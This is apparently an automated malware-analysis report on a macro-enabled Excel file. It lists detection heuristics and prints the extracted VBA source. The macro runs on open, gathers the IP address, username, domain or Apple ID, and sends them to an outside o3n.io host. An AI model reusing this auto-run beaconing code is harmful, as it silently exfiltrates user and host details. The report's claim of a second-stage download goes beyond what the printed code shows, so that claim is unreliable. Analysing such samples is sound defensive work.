MALICIOUS
388
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1059.003 Windows Command Shell
The sample contains a Workbook_Open macro that executes VBA code. This code uses WScript.Shell and CreateObject to construct a URL, which is then used to attempt a download via Application.Workbooks.CanCheckOut. This indicates the macro is designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Valyria-10010011-0' further supports the malicious nature of the file.
Heuristics 8
-
ClamAV: Doc.Malware.Valyria-10010011-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-10010011-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usage
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6916 bytes |
SHA-256: 7fa3270834048784376fbc951725e3a36920a64e99a234335df5e4f1f23ea005 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
#If Mac Then
ip = Module1.Mac_Get_IP
username = Module1.Mac_Get_Username
appid = Module1.Mac_Get_AppleID
request = Module1.Mangle_Request(appid, username, ip, "M")
#Else
ip = Module1.Windows_Get_IP
username = Module1.Windows_Get_Username
domain = Module1.Windows_Get_Domain
request = Module1.Mangle_Request(domain, username, ip, "W")
#End If
Module1.Trigger_Token (request)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Option Explicit
Public Const BASE = ".po8r0baj1qezy5k4ybp2ge9pp.cbcb29a6623a.o3n.io..................................................................................................."
Public Const EOS = "..."
Public Function Trigger_Token(request As String)
On Error GoTo Err_Trigger
Application.Workbooks.CanCheckOut ("http://" & request)
Err_Trigger:
Exit Function
End Function
Public Function Mac_Get_IP() As String
On Error GoTo Err_IP
Dim RetVal As String
Dim IPAddress() As String
Dim Length As Integer
Dim script As String
script = "do shell script ""ifconfig"""
RetVal = MacScript(script)
IPAddress = Split(Split(RetVal, "status: active")(0), "inet")
Length = UBound(IPAddress) - LBound(IPAddress) + 1
Mac_Get_IP = Split(Trim(IPAddress(Length - 1)), " ")(0)
Exit_IP:
Exit Function
Err_IP:
Mac_Get_IP = "none"
Resume Exit_IP
End Function
Public Function Mac_Get_AppleID() As String
On Error GoTo Err_AppleID
Dim RetVal As String
Dim script As String
#If MAC_OFFICE_VERSION >= 15 Then
Dim User As String
Dim Email As String
Dim EmailArr() As String
Dim Length As Integer
User = MacScript("do shell script ""id -un"" ")
script = "do shell script ""dscl . -read /Users/" & User & " RecordName"""
RetVal = MacScript(script)
EmailArr = Split(RetVal, " ")
Length = UBound(EmailArr) - LBound(EmailArr) + 1
Dim i As Integer
For i = 0 To Length - 1
If EmailArr(i) Like "*@*" Then
RetVal = EmailArr(i)
Exit For
End If
Next i
#Else
script = "tell application " & Chr(34) & "Mail" & Chr(34) & _
" to get email addresses of every account"
RetVal = MacScript(script)
#End If
Mac_Get_AppleID = Trim(RetVal)
Exit_AppleID:
Exit Function
Err_AppleID:
Mac_Get_AppleID = "none"
Resume Exit_AppleID
End Function
Public Function Mac_Get_Username() As String
On Error GoTo Err_Username
Dim sUsername As String
sUsername = Environ$("USER")
Mac_Get_Username = sUsername
Exit_Username:
Exit Function
Err_Username:
Mac_Get_Username = "none"
Resume Exit_Username
End Function
Public Function Windows_Get_IP() As String
On Error GoTo Err_IP
Dim WshShell As Object
Dim oExec As Object
Dim sOutput As String
Dim sArr() As String
Set WshShell = VBA.CreateObject("WScript.Shell")
Set oExec = WshShell.exec("ipconfig.exe")
oExec.StdIn.Write "/a"
sOutput = oExec.StdOut.ReadAll()
sArr = Split(Split(Split(sOutput, "IPv4 Address")(1), ":")(1), " ")
Windows_Get_IP = Replace(Replace(Trim(sArr(1)), Chr(10), ""), Chr(13), "")
Exit_IP:
Exit Function
Err_IP:
Windows_Get_IP = "none"
Resume Exit_IP
End Function
Public Function Windows_Get_Username() As String
On Error GoTo Err_Username
Dim s
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 23552 bytes |
SHA-256: 76720a0a520058ae15dcb847a9c55ee1dfe18a934cda96cb3baec0ba2ac38baf |
|||
|
Detection
ClamAV:
Doc.Malware.Valyria-10010011-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.